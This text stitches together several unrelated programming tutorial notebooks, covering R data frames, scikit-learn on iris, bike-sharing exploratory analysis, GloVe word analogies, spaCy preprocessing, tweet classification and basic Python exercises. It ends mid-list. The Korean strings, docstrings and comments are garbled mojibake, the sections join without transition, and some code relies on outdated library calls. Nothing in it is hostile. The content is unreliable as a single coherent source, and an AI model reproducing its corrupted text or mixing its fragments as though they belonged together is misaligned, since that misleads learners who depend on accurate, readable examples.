# Starting with Data
**Questions**
- What is a data.frame?
- How can I read a complete csv file into R?
- How can I get basic summary information about my dataset?
- How can I change the way R treats strings in my dataset?
- Why would I want strings to be treated differently?
- How are dates represented in R and how can I change the format?
**Objectives**
- Describe what a data frame is.
- Load external data from a .csv file into a data frame.
- Summarize the contents of a data frame.
- Describe the difference between a factor and a string.
- Convert between strings and factors.
- Reorder and rename factors.
- Change how character strings are handled in a data frame.
- Examine and change date formats.
We are going to skip a few steps for the moment. Because we are not in the RStudio environment, things are a little easier, but rest assured the instructions for RStudio are available in a separate notebook in this folder.
R has some base functions for reading a local data file into your R session, namely read.table() and read.csv(), but these have some idiosyncrasies that were improved upon in the readr package, which is installed and loaded with the tidyverse.
```
library(tidyverse)
```
To get our sample data into our R session, we will use the read_csv() function and assign the result to an object called books.
```
books <- read_csv("./data/books.csv")
```
You will see the message Parsed with column specification, followed by each column name and its data type. When you execute read_csv on a data file, it looks through the first 1000 rows of each column and guesses the data type for each column as it reads it into R. For example, in this dataset, it reads SUBJECT as col_character (character), and TOT.CHKOUT as col_double. You have the option to specify the data type for a column manually by using the col_types argument in read_csv.
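For example, here is a minimal sketch of overriding the guessed types for the two columns mentioned above (any columns not listed are still guessed):
```
books <- read_csv("./data/books.csv",
                  col_types = cols(SUBJECT = col_character(),
                                   TOT.CHKOUT = col_double()))
```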
You should now have an R object called books in your environment: 10,000 observations of 12 variables. We will be using this data file in the next module.
> NOTE : read_csv() assumes that fields are delimited by commas; however, in several countries the comma is used as a decimal separator and the semicolon (;) as a field delimiter. If you want to read this kind of file in R, you can use the read_csv2() function. It behaves exactly like read_csv() but uses different defaults for the decimal and field separators. If you are working with another format, both can be specified by the user. Check out the help for read_csv() by typing ?read_csv to learn more. There is also read_tsv() for tab-separated data files, and read_delim() allows you to specify more details about the structure of your file.
## What are data frames and tibbles?
Data frames are the de facto data structure for tabular data in R, and what we use for data processing, statistics, and plotting.
A data frame is the representation of data in the format of a table where the columns are vectors that all have the same length. Because columns are vectors, each column must contain a single type of data (e.g., characters, integers, factors). For example, here is a figure depicting a data frame comprising a numeric, a character, and a logical vector.
A data frame can be created by hand, but most commonly they are generated by the functions read_csv() or read_table(); in other words, when importing spreadsheets from your hard drive (or the web).
A tibble is an extension of R data frames used by the tidyverse. When the data is read using read_csv(), it is stored in an object of class tbl_df, tbl, and data.frame. You can see the class of an object with class().
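For example, checking the class of our imported object:
```
class(books)
# should list "tbl_df", "tbl", and "data.frame"
```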
## Inspecting data frames
When calling a tbl_df object (like books here), there is already a lot of information about our data frame being displayed, such as the number of rows, the number of columns, the names of the columns, and, as we just saw, the class of data stored in each column. However, there are functions to extract this information from data frames. Here is a non-exhaustive list of some of these functions. Let's try them out!
- Size:
- dim(books) - returns a vector with the number of rows in the first element, and the number of columns as the second element (the dimensions of the object)
- nrow(books) - returns the number of rows
- ncol(books) - returns the number of columns
- Content:
- head(books) - shows the first 6 rows
- tail(books) - shows the last 6 rows
- Names:
- names(books) - returns the column names (synonym of colnames() for data.frame objects)
- Summary:
- View(books) - look at the data in the viewer
- str(books) - structure of the object and information about the class, length and content of each column
- summary(books) - summary statistics for each column
Note: most of these functions are "generic"; they can be used on other types of objects besides data frames.
The map() function from purrr is a useful way of running a function on all variables in a data frame or list. If you loaded the tidyverse at the beginning of the session, you also loaded purrr. Here we call class() on books using map_chr(), which will return a character vector of the classes for each variable.
```
map_chr(books, class)
```
## Indexing and subsetting data frames
Our books data frame has 2 dimensions: rows (observations) and columns (variables). If we want to extract some specific data from it, we need to specify the "coordinates" we want from it. In the last session, we used square brackets [ ] to subset values from vectors. Here we will do the same thing for data frames, but we can now add a second dimension. Row numbers come first, followed by column numbers. However, note that different ways of specifying these coordinates lead to results with different classes.
```
## first element in the first column of the data frame (as a vector)
books[1, 1]
## first element in the 6th column (as a vector)
books[1, 6]
## first column of the data frame (as a vector)
books[[1]]
## first column of the data frame (as a data.frame)
books[1]
## first three elements in the 7th column (as a vector)
books[1:3, 7]
## the 3rd row of the data frame (as a data.frame)
books[3, ]
## equivalent to head_books <- head(books)
head_books <- books[1:6, ]
```
## Dollar sign
The dollar sign $ is used to distinguish a specific variable (column, in Excel-speak) in a data frame:
```
head(books$X245.ab) # print the first six book titles
# print the mean number of checkouts
mean(books$TOT.CHKOUT)
```
## unique(), table(), and duplicated()
### unique()
- to see all the distinct values in a variable:
```
unique(books$BCODE2)
```
### table()
- to get quick frequency counts on a variable:
```
table(books$BCODE2) # frequency counts on a variable
```
You can combine table() with relational operators:
```
table(books$TOT.CHKOUT > 50) # how many books have more than 50 checkouts?
```
### duplicated()
- will give you a logical vector of duplicated values.
```
duplicated(books$ISN) # a TRUE/FALSE vector of duplicated values in the ISN column
!duplicated(books$ISN) # you can put an exclamation mark before it to get non-duplicated values
table(duplicated(books$ISN)) # run a table of duplicated values
which(duplicated(books$ISN)) # get row numbers of duplicated values
```
## Exploring missing values
You may also need to know the number of missing values:
```
sum(is.na(books)) # How many total missing values?
colSums(is.na(books)) # Total missing values per column
table(is.na(books$ISN)) # use table() and is.na() in combination
booksNoNA <- na.omit(books) # Return only observations that have no missing values
```
### Exercise 3.1
1. Call View(books) to examine the data frame. Use the small arrow buttons next to the variable name to sort TOT.CHKOUT by the highest checkouts. What item has the most checkouts?
2. What is the class of the TOT.CHKOUT variable?
3. Use table() and is.na() to find out how many NA values are in the ISN variable.
4. Call summary(books$TOT.CHKOUT). What can we infer when we compare the mean, median, and max?
5. hist() will print a rudimentary histogram, which displays frequency counts. Call hist(books$TOT.CHKOUT). What is this telling us?
```
#Exercise 3.1
```
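One possible way to approach questions 2-5 (a sketch rather than the only answer, using the column names from above):
```
class(books$TOT.CHKOUT)   # 2. class of the variable
table(is.na(books$ISN))   # 3. how many NA values are in ISN?
summary(books$TOT.CHKOUT) # 4. compare the mean, median, and max
hist(books$TOT.CHKOUT)    # 5. rudimentary histogram of checkouts
```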
## Logical tests
R contains a number of operators you can use to compare values. Use help(Comparison) to read the R help file. Note that two equal signs (==) are used for evaluating equality (because one equals sign (=) is used for assigning variables).
| Operator | Function |
| :--- | ---: |
| < | Less Than |
| > | Greater Than |
| == | Equal To |
| <= | Less Than or Equal To |
| >= | Greater Than or Equal To |
| != | Not Equal To |
| %in% | Has a Match In |
| is.na() | Is NA |
| !is.na() | Is Not NA |
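Applied to our data, for example:
```
table(books$TOT.CHKOUT == 0)   # how many books were never checked out?
table(books$TOT.CHKOUT >= 100) # how many books have at least 100 checkouts?
```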
Sometimes you need to do multiple logical tests (think Boolean logic). Use help(Logic) to read the help file.
| Operator | Function |
| :--- | ---: |
| & | boolean AND |
| | | boolean OR |
| ! | boolean NOT |
| any() | Are some values true? |
| all() | Are all values true? |
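These can be combined with the relational operators above; for example (the subject strings here are made up purely for illustration):
```
# books with more than 50 checkouts that also have a non-missing ISN
sum(books$TOT.CHKOUT > 50 & !is.na(books$ISN))
# is any subject an exact match for one of these strings?
any(books$SUBJECT %in% c("Engineering", "History"))
```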
> Key Points
- Use read_csv() to read tabular data into R.
- Use factors to represent categorical data in R.
# 1.2 Sklearn
* Loading the data
* 1.2.1. Splitting the data with scikit-learn
* 1.2.2. Supervised learning with scikit-learn
* 1.2.3. Unsupervised learning with scikit-learn
* 1.2.4. Feature extraction with scikit-learn
```
import sklearn
sklearn.__version__
```
### Loading the data
```
from sklearn.datasets import load_iris
iris_dataset = load_iris()
print("iris_dataset key: {}".format(iris_dataset.keys()))
print(iris_dataset['data'])
print("shape of data: {}". format(iris_dataset['data'].shape))
print(iris_dataset['feature_names'])
print(iris_dataset['target'])
print(iris_dataset['target_names'])
print(iris_dataset['DESCR'])
```
## 1.2.1. Splitting the data with scikit-learn
```
target = iris_dataset['target']
from sklearn.model_selection import train_test_split
train_input, test_input, train_label, test_label = train_test_split(iris_dataset['data'],
target,
test_size = 0.25,
random_state=42)
print("shape of train_input: {}".format(train_input.shape))
print("shape of test_input: {}".format(test_input.shape))
print("shape of train_label: {}".format(train_label.shape))
print("shape of test_label: {}".format(test_label.shape))
```
## 1.2.2. Supervised learning with scikit-learn
```
from sklearn.neighbors import KNeighborsClassifier
knn = KNeighborsClassifier(n_neighbors = 1)
knn.fit(train_input, train_label)
import numpy as np
new_input = np.array([[6.1, 2.8, 4.7, 1.2]])
knn.predict(new_input)
predict_label = knn.predict(test_input)
print(predict_label)
print('test accuracy {:.2f}'.format(np.mean(predict_label == test_label)))
```
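As a small aside (not part of the original notebook), the same test accuracy can also be read directly from the fitted classifier's score method:
```
# mean accuracy on the held-out data, equivalent to the manual np.mean comparison above
print('test accuracy {:.2f}'.format(knn.score(test_input, test_label)))
```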
## 1.2.3. Unsupervised learning with scikit-learn
```
from sklearn.cluster import KMeans
k_means = KMeans(n_clusters=3)
k_means.fit(train_input)
k_means.labels_
print("0 cluster:", train_label[k_means.labels_ == 0])
print("1 cluster:", train_label[k_means.labels_ == 1])
print("2 cluster:", train_label[k_means.labels_ == 2])
import numpy as np
new_input = np.array([[6.1, 2.8, 4.7, 1.2]])
prediction = k_means.predict(new_input)
print(prediction)
predict_cluster = k_means.predict(test_input)
print(predict_cluster)
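# NOTE (added comment): KMeans assigns arbitrary cluster IDs, so they are remapped below to
# match the iris label encoding before computing accuracy; the particular 0->1, 1->0, 2->2
# mapping is specific to this fit and would change with a different initialization.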
np_arr = np.array(predict_cluster)
np_arr[np_arr==0], np_arr[np_arr==1], np_arr[np_arr==2] = 3, 4, 5
np_arr[np_arr==3] = 1
np_arr[np_arr==4] = 0
np_arr[np_arr==5] = 2
predict_label = np_arr.tolist()
print(predict_label)
print('test accuracy {:.2f}'.format(np.mean(predict_label == test_label)))
```
## 1.2.4. Feature extraction with scikit-learn
* CountVectorizer
* TfidfVectorizer
### CountVectorizer
```
from sklearn.feature_extraction.text import CountVectorizer
text_data = ['๋๋ ๋ฐฐ๊ฐ ๊ณ ํ๋ค', '๋ด์ผ ์ ์ฌ ๋ญ๋จน์ง', '๋ด์ผ ๊ณต๋ถ ํด์ผ๊ฒ ๋ค', '์ ์ฌ ๋จน๊ณ ๊ณต๋ถ ํด์ผ์ง']
count_vectorizer = CountVectorizer()
count_vectorizer.fit(text_data)
print(count_vectorizer.vocabulary_)
sentence = [text_data[0]] # ['๋๋ ๋ฐฐ๊ฐ ๊ณ ํ๋ค']
print(count_vectorizer.transform(sentence).toarray())
```
### TfidfVectorizer
```
from sklearn.feature_extraction.text import TfidfVectorizer
text_data = ['๋๋ ๋ฐฐ๊ฐ ๊ณ ํ๋ค', '๋ด์ผ ์ ์ฌ ๋ญ๋จน์ง', '๋ด์ผ ๊ณต๋ถ ํด์ผ๊ฒ ๋ค', '์ ์ฌ ๋จน๊ณ ๊ณต๋ถ ํด์ผ์ง']
tfidf_vectorizer = TfidfVectorizer()
tfidf_vectorizer.fit(text_data)
print(tfidf_vectorizer.vocabulary_)
sentence = [text_data[3]] # ['์ ์ฌ ๋จน๊ณ ๊ณต๋ถ ํด์ผ์ง']
print(tfidf_vectorizer.transform(sentence).toarray())
```
<a href="https://colab.research.google.com/github/SLCFLAB/Data-Science-Python/blob/main/Day%209/9_1_0_bike_sharing_data.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
Machine Learning & Deep Learning Problem-Solving Strategies (Baekkyun Shin)
https://www.kaggle.com/code/werooring/ch6-eda/notebook
# Exploratory data analysis for the bike sharing demand prediction competition
- [Bike Sharing Demand competition link](https://www.kaggle.com/c/bike-sharing-demand)
- [Reference notebook for the exploratory data analysis code](https://www.kaggle.com/viveksrinivasan/eda-ensemble-model-top-10-percentile)
## 1. A first look at the data
```
import numpy as np
import pandas as pd
# data path
data_path = 'https://raw.githubusercontent.com/SLCFLAB/Data-Science-Python/main/Day%209/data/'
train = pd.read_csv(data_path + 'bike_train.csv')
test = pd.read_csv(data_path + 'bike_test.csv')
submission = pd.read_csv(data_path + 'bike_sampleSubmission.csv')
train.shape, test.shape
train.head()
test.head()
submission.head()
train.info()
test.info()
```
## 2. Feature engineering for more effective analysis
```
print(train['datetime'][100]) # the 100th datetime value
print(train['datetime'][100].split()) # split the string on whitespace
print(train['datetime'][100].split()[0]) # date
print(train['datetime'][100].split()[1]) # time
print(train['datetime'][100].split()[0]) # date
print(train['datetime'][100].split()[0].split('-')) # split the date on "-"
print(train['datetime'][100].split()[0].split('-')[0]) # year
print(train['datetime'][100].split()[0].split('-')[1]) # month
print(train['datetime'][100].split()[0].split('-')[2]) # day
print(train['datetime'][100].split()[1]) # time
print(train['datetime'][100].split()[1].split(':')) # split the time on ":"
print(train['datetime'][100].split()[1].split(':')[0]) # hour
print(train['datetime'][100].split()[1].split(':')[1]) # minute
print(train['datetime'][100].split()[1].split(':')[2]) # second
train['date'] = train['datetime'].apply(lambda x: x.split()[0]) # create the date feature
# create year, month, day, hour, minute and second features in turn
train['year'] = train['datetime'].apply(lambda x: x.split()[0].split('-')[0])
train['month'] = train['datetime'].apply(lambda x: x.split()[0].split('-')[1])
train['day'] = train['datetime'].apply(lambda x: x.split()[0].split('-')[2])
train['hour'] = train['datetime'].apply(lambda x: x.split()[1].split(':')[0])
train['minute'] = train['datetime'].apply(lambda x: x.split()[1].split(':')[1])
train['second'] = train['datetime'].apply(lambda x: x.split()[1].split(':')[2])
from datetime import datetime
import calendar
print(train['date'][100]) # date
print(datetime.strptime(train['date'][100], '%Y-%m-%d')) # convert to a datetime object
print(datetime.strptime(train['date'][100], '%Y-%m-%d').weekday()) # weekday as an integer
print(calendar.day_name[datetime.strptime(train['date'][100], '%Y-%m-%d').weekday()]) # weekday as a string
train['weekday'] = train['date'].apply(
lambda dateString:
calendar.day_name[datetime.strptime(dateString,"%Y-%m-%d").weekday()])
train['weekday']
train['season'] = train['season'].map({1: 'Spring',
2: 'Summer',
3: 'Fall',
4: 'Winter' })
train['weather'] = train['weather'].map({1: 'Clear',
2: 'Mist, Few clouds',
3: 'Light Snow, Rain, Thunder',
4: 'Heavy Snow, Rain, Thunder'})
train.head()
```
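As an aside (not in the original notebook), the same kind of features can be derived more directly with pandas' datetime accessor; a minimal sketch assuming the same train DataFrame, shown for comparison rather than as a replacement for the cell above:
```
# parse the strings once, then read components off the .dt accessor
parsed = pd.to_datetime(train['datetime'])
train['year'] = parsed.dt.year           # integer year (the string splitting above yields strings)
train['hour'] = parsed.dt.hour
train['weekday'] = parsed.dt.day_name()  # e.g. 'Saturday'
```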
## 3. Data visualization
```
import seaborn as sns
import matplotlib as mpl
import matplotlib.pyplot as plt
%matplotlib inline
```
### Distribution plots
```
mpl.rc('font', size=15) # set the font size to 15
sns.displot(train['count']); # draw the distribution plot
sns.displot(np.log(train['count']));
```
### Bar plots
```
# Step 1: prepare an m-by-n grid of subplots
mpl.rc('font', size=14) # set the font size
mpl.rc('axes', titlesize=15) # set the title size for each axis
figure, axes = plt.subplots(nrows=3, ncols=2) # create a 3-row, 2-column figure
plt.tight_layout() # add spacing between the plots
figure.set_size_inches(10, 9) # set the overall figure size to 10x9 inches
# Step 2: assign a plot to each axis
# bar plots of mean rental counts by year, month, day, hour, minute and second
sns.barplot(x='year', y='count', data=train, ax=axes[0, 0])
sns.barplot(x='month', y='count', data=train, ax=axes[0, 1])
sns.barplot(x='day', y='count', data=train, ax=axes[1, 0])
sns.barplot(x='hour', y='count', data=train, ax=axes[1, 1])
sns.barplot(x='minute', y='count', data=train, ax=axes[2, 0])
sns.barplot(x='second', y='count', data=train, ax=axes[2, 1])
# Step 3: detailed settings
# 3-1 : add a title to each subplot
axes[0, 0].set(title='Rental amounts by year')
axes[0, 1].set(title='Rental amounts by month')
axes[1, 0].set(title='Rental amounts by day')
axes[1, 1].set(title='Rental amounts by hour')
axes[2, 0].set(title='Rental amounts by minute')
axes[2, 1].set(title='Rental amounts by second')
# 3-2 : rotate the x-axis labels of the subplots in row index 1 by 90 degrees
axes[1, 0].tick_params(axis='x', labelrotation=90)
axes[1, 1].tick_params(axis='x', labelrotation=90)
```
### Box plots
```
# Step 1: prepare an m-by-n grid of subplots
figure, axes = plt.subplots(nrows=2, ncols=2) # 2 rows, 2 columns
plt.tight_layout()
figure.set_size_inches(10, 10)
# Step 2: assign a plot to each axis
# box plots of rental counts by season, weather, holiday and working day
sns.boxplot(x='season', y='count', data=train, ax=axes[0, 0])
sns.boxplot(x='weather', y='count', data=train, ax=axes[0, 1])
sns.boxplot(x='holiday', y='count', data=train, ax=axes[1, 0])
sns.boxplot(x='workingday', y='count', data=train, ax=axes[1, 1])
# Step 3: detailed settings
# 3-1 : add a title to each subplot
axes[0, 0].set(title='Box Plot On Count Across Season')
axes[0, 1].set(title='Box Plot On Count Across Weather')
axes[1, 0].set(title='Box Plot On Count Across Holiday')
axes[1, 1].set(title='Box Plot On Count Across Working Day')
# 3-2 : fix overlapping x-axis labels
axes[0, 1].tick_params('x', labelrotation=10) # rotate by 10 degrees
```
### Point plots
```
# Step 1: prepare an m-by-n grid of subplots
mpl.rc('font', size=11)
figure, axes = plt.subplots(nrows=5) # 5 rows, 1 column
figure.set_size_inches(12, 18)
# Step 2: assign a plot to each axis
# point plots of mean hourly rental counts by working day, holiday, weekday, season and weather
sns.pointplot(x='hour', y='count', data=train, hue='workingday', ax=axes[0])
sns.pointplot(x='hour', y='count', data=train, hue='holiday', ax=axes[1])
sns.pointplot(x='hour', y='count', data=train, hue='weekday', ax=axes[2])
sns.pointplot(x='hour', y='count', data=train, hue='season', ax=axes[3])
sns.pointplot(x='hour', y='count', data=train, hue='weather', ax=axes[4]);
```
### Scatter plots with regression lines
```
# Step 1: prepare an m-by-n grid of subplots
mpl.rc('font', size=15)
figure, axes = plt.subplots(nrows=2, ncols=2) # 2 rows, 2 columns
plt.tight_layout()
figure.set_size_inches(7, 6)
# Step 2: assign a plot to each axis
# scatter plots of rental counts against temperature, "feels-like" temperature, wind speed and humidity
sns.regplot(x='temp', y='count', data=train, ax=axes[0, 0],
scatter_kws={'alpha': 0.2}, line_kws={'color': 'blue'})
sns.regplot(x='atemp', y='count', data=train, ax=axes[0, 1],
scatter_kws={'alpha': 0.2}, line_kws={'color': 'blue'})
sns.regplot(x='windspeed', y='count', data=train, ax=axes[1, 0],
scatter_kws={'alpha': 0.2}, line_kws={'color': 'blue'})
sns.regplot(x='humidity', y='count', data=train, ax=axes[1, 1],
scatter_kws={'alpha': 0.2}, line_kws={'color': 'blue'});
```
### Heatmap
```
train[['temp', 'atemp', 'humidity', 'windspeed', 'count']].corr()
# correlation matrix between the features
corrMat = train[['temp', 'atemp', 'humidity', 'windspeed', 'count']].corr()
fig, ax= plt.subplots()
fig.set_size_inches(10, 10)
sns.heatmap(corrMat, annot=True) # draw the correlation heatmap
ax.set(title='Heatmap of Numerical Data');
```
*You can view this notebook with the Jupyter notebook viewer (nbviewer.jupyter.org) or run it in Google Colab (colab.research.google.com) via the links below.*
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://nbviewer.jupyter.org/github/rickiepark/nlp-with-pytorch/blob/master/chapter_5/5_1_Pretrained_Embeddings.ipynb"><img src="https://jupyter.org/assets/main-logo.svg" width="28" />View in the Jupyter notebook viewer</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/rickiepark/nlp-with-pytorch/blob/master/chapter_5/5_1_Pretrained_Embeddings.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
</td>
</table>
```
# Install the annoy package.
!pip install annoy
import torch
import torch.nn as nn
from tqdm import tqdm
from annoy import AnnoyIndex
import numpy as np
class PreTrainedEmbeddings(object):
""" ์ฌ์ ํ๋ จ๋ ๋จ์ด ๋ฒกํฐ ์ฌ์ฉ์ ์ํ ๋ํผ ํด๋์ค """
def __init__(self, word_to_index, word_vectors):
"""
๋งค๊ฐ๋ณ์:
word_to_index (dict): ๋จ์ด์์ ์ ์๋ก ๋งคํ
word_vectors (numpy ๋ฐฐ์ด์ ๋ฆฌ์คํธ)
"""
self.word_to_index = word_to_index
self.word_vectors = word_vectors
self.index_to_word = {v: k for k, v in self.word_to_index.items()}
self.index = AnnoyIndex(len(word_vectors[0]), metric='euclidean')
        print("Building the index!")
for _, i in self.word_to_index.items():
self.index.add_item(i, self.word_vectors[i])
self.index.build(50)
        print("Done!")
@classmethod
def from_embeddings_file(cls, embedding_file):
"""์ฌ์ ํ๋ จ๋ ๋ฒกํฐ ํ์ผ์์ ๊ฐ์ฒด๋ฅผ ๋ง๋ญ๋๋ค.
๋ฒกํฐ ํ์ผ์ ๋ค์๊ณผ ๊ฐ์ ํฌ๋งท์
๋๋ค:
word0 x0_0 x0_1 x0_2 x0_3 ... x0_N
word1 x1_0 x1_1 x1_2 x1_3 ... x1_N
๋งค๊ฐ๋ณ์:
embedding_file (str): ํ์ผ ์์น
๋ฐํ๊ฐ:
PretrainedEmbeddings์ ์ธ์คํด์ค
"""
word_to_index = {}
word_vectors = []
with open(embedding_file) as fp:
for line in fp.readlines():
line = line.split(" ")
word = line[0]
vec = np.array([float(x) for x in line[1:]])
word_to_index[word] = len(word_to_index)
word_vectors.append(vec)
return cls(word_to_index, word_vectors)
def get_embedding(self, word):
"""
๋งค๊ฐ๋ณ์:
word (str)
๋ฐํ๊ฐ
์๋ฒ ๋ฉ (numpy.ndarray)
"""
return self.word_vectors[self.word_to_index[word]]
def get_closest_to_vector(self, vector, n=1):
"""๋ฒกํฐ๊ฐ ์ฃผ์ด์ง๋ฉด n ๊ฐ์ ์ต๊ทผ์ ์ด์์ ๋ฐํํฉ๋๋ค
๋งค๊ฐ๋ณ์:
vector (np.ndarray): Annoy ์ธ๋ฑ์ค์ ์๋ ๋ฒกํฐ์ ํฌ๊ธฐ์ ๊ฐ์์ผ ํฉ๋๋ค
n (int): ๋ฐํ๋ ์ด์์ ๊ฐ์
๋ฐํ๊ฐ:
[str, str, ...]: ์ฃผ์ด์ง ๋ฒกํฐ์ ๊ฐ์ฅ ๊ฐ๊น์ด ๋จ์ด
๋จ์ด๋ ๊ฑฐ๋ฆฌ์์ผ๋ก ์ ๋ ฌ๋์ด ์์ง ์์ต๋๋ค.
"""
nn_indices = self.index.get_nns_by_vector(vector, n)
return [self.index_to_word[neighbor] for neighbor in nn_indices]
def compute_and_print_analogy(self, word1, word2, word3):
"""๋จ์ด ์๋ฒ ๋ฉ์ ์ฌ์ฉํ ์ ์ถ ๊ฒฐ๊ณผ๋ฅผ ์ถ๋ ฅํฉ๋๋ค
word1์ด word2์ผ ๋ word3์ __์
๋๋ค.
์ด ๋ฉ์๋๋ word1 : word2 :: word3 : word4๋ฅผ ์ถ๋ ฅํฉ๋๋ค
๋งค๊ฐ๋ณ์:
word1 (str)
word2 (str)
word3 (str)
"""
vec1 = self.get_embedding(word1)
vec2 = self.get_embedding(word2)
vec3 = self.get_embedding(word3)
        # compute the fourth word's embedding
spatial_relationship = vec2 - vec1
vec4 = vec3 + spatial_relationship
closest_words = self.get_closest_to_vector(vec4, n=4)
existing_words = set([word1, word2, word3])
closest_words = [word for word in closest_words
if word not in existing_words]
if len(closest_words) == 0:
            print("Could not find the nearest neighbors for the computed vector!")
return
for word4 in closest_words:
print("{} : {} :: {} : {}".format(word1, word2, word3, word4))
# Download the GloVe data.
!wget http://nlp.stanford.edu/data/glove.6B.zip
!unzip glove.6B.zip
!mkdir -p data/glove
!mv glove.6B.100d.txt data/glove
embeddings = PreTrainedEmbeddings.from_embeddings_file('data/glove/glove.6B.100d.txt')
embeddings.compute_and_print_analogy('man', 'he', 'woman')
embeddings.compute_and_print_analogy('fly', 'plane', 'sail')
embeddings.compute_and_print_analogy('cat', 'kitten', 'dog')
embeddings.compute_and_print_analogy('blue', 'color', 'dog')
embeddings.compute_and_print_analogy('leg', 'legs', 'hand')
embeddings.compute_and_print_analogy('toe', 'foot', 'finger')
embeddings.compute_and_print_analogy('talk', 'communicate', 'read')
embeddings.compute_and_print_analogy('blue', 'democrat', 'red')
embeddings.compute_and_print_analogy('man', 'king', 'woman')
embeddings.compute_and_print_analogy('man', 'doctor', 'woman')
embeddings.compute_and_print_analogy('fast', 'fastest', 'small')
```
```
!conda info
conda install -c conda-forge spacy
!python -m spacy download en_core_web_sm
```
## Word tokenization
```
# Word tokenization
from spacy.lang.en import English
# Load English tokenizer, tagger, parser, NER and word vectors
nlp = English()
text = """When learning data science, you shouldn't get discouraged!
Challenges and setbacks aren't failures, they're just part of the journey. You've got this!"""
# "nlp" Object is used to create documents with linguistic annotations.
my_doc = nlp(text)
# Create list of word tokens
token_list = []
for token in my_doc:
token_list.append(token.text)
print(token_list)
```
### Sentence Tokenization
```
# sentence tokenization
# Load English tokenizer, tagger, parser, NER and word vectors
nlp = English()
# Create the pipeline 'sentencizer' component
sbd = nlp.create_pipe('sentencizer')
# Add the component to the pipeline
nlp.add_pipe(sbd)
text = """When learning data science, you shouldn't get discouraged!
Challenges and setbacks aren't failures, they're just part of the journey. You've got this!"""
# "nlp" Object is used to create documents with linguistic annotations.
doc = nlp(text)
# create list of sentence tokens
sents_list = []
for sent in doc.sents:
sents_list.append(sent.text)
print(sents_list)
```
### Stop word removal
```
#Stop words
#importing stop words from English language.
import spacy
spacy_stopwords = spacy.lang.en.stop_words.STOP_WORDS
#Printing the total number of stop words:
print('Number of stop words: %d' % len(spacy_stopwords))
#Printing first ten stop words:
print('First ten stop words: %s' % list(spacy_stopwords)[:20])
from spacy.lang.en.stop_words import STOP_WORDS
#Implementation of stop words:
filtered_sent=[]
# "nlp" Object is used to create documents with linguistic annotations.
doc = nlp(text)
# filtering stop words
for word in doc:
if word.is_stop==False:
filtered_sent.append(word)
print("Filtered Sentence:",filtered_sent)
```
### Lemmatization
```
# Implementing lemmatization
lem = nlp("run runs running runner")
# finding lemma for each word
for word in lem:
print(word.text,word.lemma_)
```
### Part of Speech Tagging
```
# POS tagging
# importing the model en_core_web_sm of English for vocabulary, syntax & entities
import en_core_web_sm
# load en_core_web_sm of English for vocabulary, syntax & entities
nlp = en_core_web_sm.load()
# "nlp" Object is used to create documents with linguistic annotations.
docs = nlp(u"All is well that ends well.")
for word in docs:
print(word.text,word.pos_)
```
# Twitter hate speech modeling
```
!conda install -c anaconda nltk -y
import pandas as pd
import re
data = pd.read_csv("/Users/manishanker.talusani/Downloads/twitter-sentiment-analysis-hatred-speech/train.csv")
tweets = data.tweet[:100]
tweets.head().tolist()
""" Cleaning Tweets """
tweets = tweets.str.lower() # lowercasing
tweets = tweets.apply(lambda x : re.sub("[^a-z\s]","",x) ) # removing special characters and numbers
from nltk.corpus import stopwords
stopwords = set(stopwords.words("english"))
tweets = tweets.apply(lambda x : " ".join(word for word in x.split() if word not in stopwords ))
tweets.head().tolist()
import spacy
import en_core_web_sm
import numpy as np
nlp = en_core_web_sm.load()
document = nlp(tweets[0])
print("Document : ",document)
print("Tokens : ")
for token in document:
print(token.text)
```
## get word vectors out of word from spacy
```
document = nlp(tweets[0])
print(document)
for token in document:
print(token.text, token.vector.shape)
```
### `token.vector` creates a vector of size (96,). The code above gets a vector for every single word of a single sentence/document.
```
document = nlp.pipe(tweets)
tweets_vector = np.array([tweet.vector for tweet in document])
print(tweets_vector.shape)
```
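A side note (an observation worth verifying rather than a documented guarantee for every model): for a pipeline like this the document vector is the average of its token vectors, which is easy to check:
```
document = nlp(tweets[0])
token_mean = np.mean([token.vector for token in document], axis=0)
print(np.allclose(document.vector, token_mean))  # expected to print True if doc.vector is the token average
```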
## Take the complete dataset and apply Logistic regression
```
tweets = data.tweet
document = nlp.pipe(tweets)
tweets_vector = np.array([tweet.vector for tweet in document])
print(tweets_vector.shape)
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
X = tweets_vector
y = data["label"]
X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y, test_size=0.3, random_state=0)
model = LogisticRegression(C=0.1)
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
print("Accuracy on test data is : %0.2f" %(accuracy_score(y_test, y_pred)*100))
y_train_pred = model.predict(X_train)
print("Accuracy on train data is : %0.2f" %(accuracy_score(y_train, y_train_pred)*100))
```
```
powers = [x**y for x in range(1, 10) for y in [2,10]]
print(powers)
numbers = [x*y for x in range(1, 10) for y in [3, 5, 7]]
print(numbers)
draw_dict = {
    'Russia': 'A',
    'Portugal': 'B',
    'France': 'C',
    'Denmark': 'C',
    'Egypt': 'A'
}
for country, group in draw_dict.items():
print(country, group)
draw_dict = {
    'Russia': 'A',
    'Portugal': 'B',
    'France': 'C',
    'Denmark': 'C',
    'Egypt': 'A'
}
draw_new = {}
for country, group in draw_dict.items():
if group == 'A':
draw_new.setdefault (country, group)
print(draw_new)
2504+4994+6343
csv_file = [
    ['100412', 'Boots for alpine skis ATOMIC Hawx Prime 100', 9],
    ['100728', 'Skateboard Jdbug RT03', 32],
    ['100732', 'Caster board Razor RipStik Bright', 11],
    ['100803', 'Boots for snowboarding DC Tucknee', 20],
    ['100898', 'Pedometer Omron HJA-306', 2],
    ['100934', 'Heart rate monitor Beurer PM62', 17],
]
print(csv_file[4])
csv_file = [
    ['100412', 'Boots for alpine skis ATOMIC Hawx Prime 100', 9],
    ['100728', 'Skateboard Jdbug RT03', 32],
    ['100732', 'Caster board Razor RipStik Bright', 11],
    ['100803', 'Boots for snowboarding DC Tucknee', 20],
    ['100898', 'Pedometer Omron HJA-306', 2],
    ['100934', 'Heart rate monitor Beurer PM62', 17],
]
pulsometer_id = csv_file[4][2]
for record in csv_file:
    if record[1] == 'Pedometer Omron HJA-306':
        print('Number of pedometers in stock - {} pcs'.format(record[2]))
csv_file = [
    ['100412', 'Boots for alpine skis ATOMIC Hawx Prime 100', 9],
    ['100728', 'Skateboard Jdbug RT03', 32],
    ['100732', 'Caster board Razor RipStik Bright', 11],
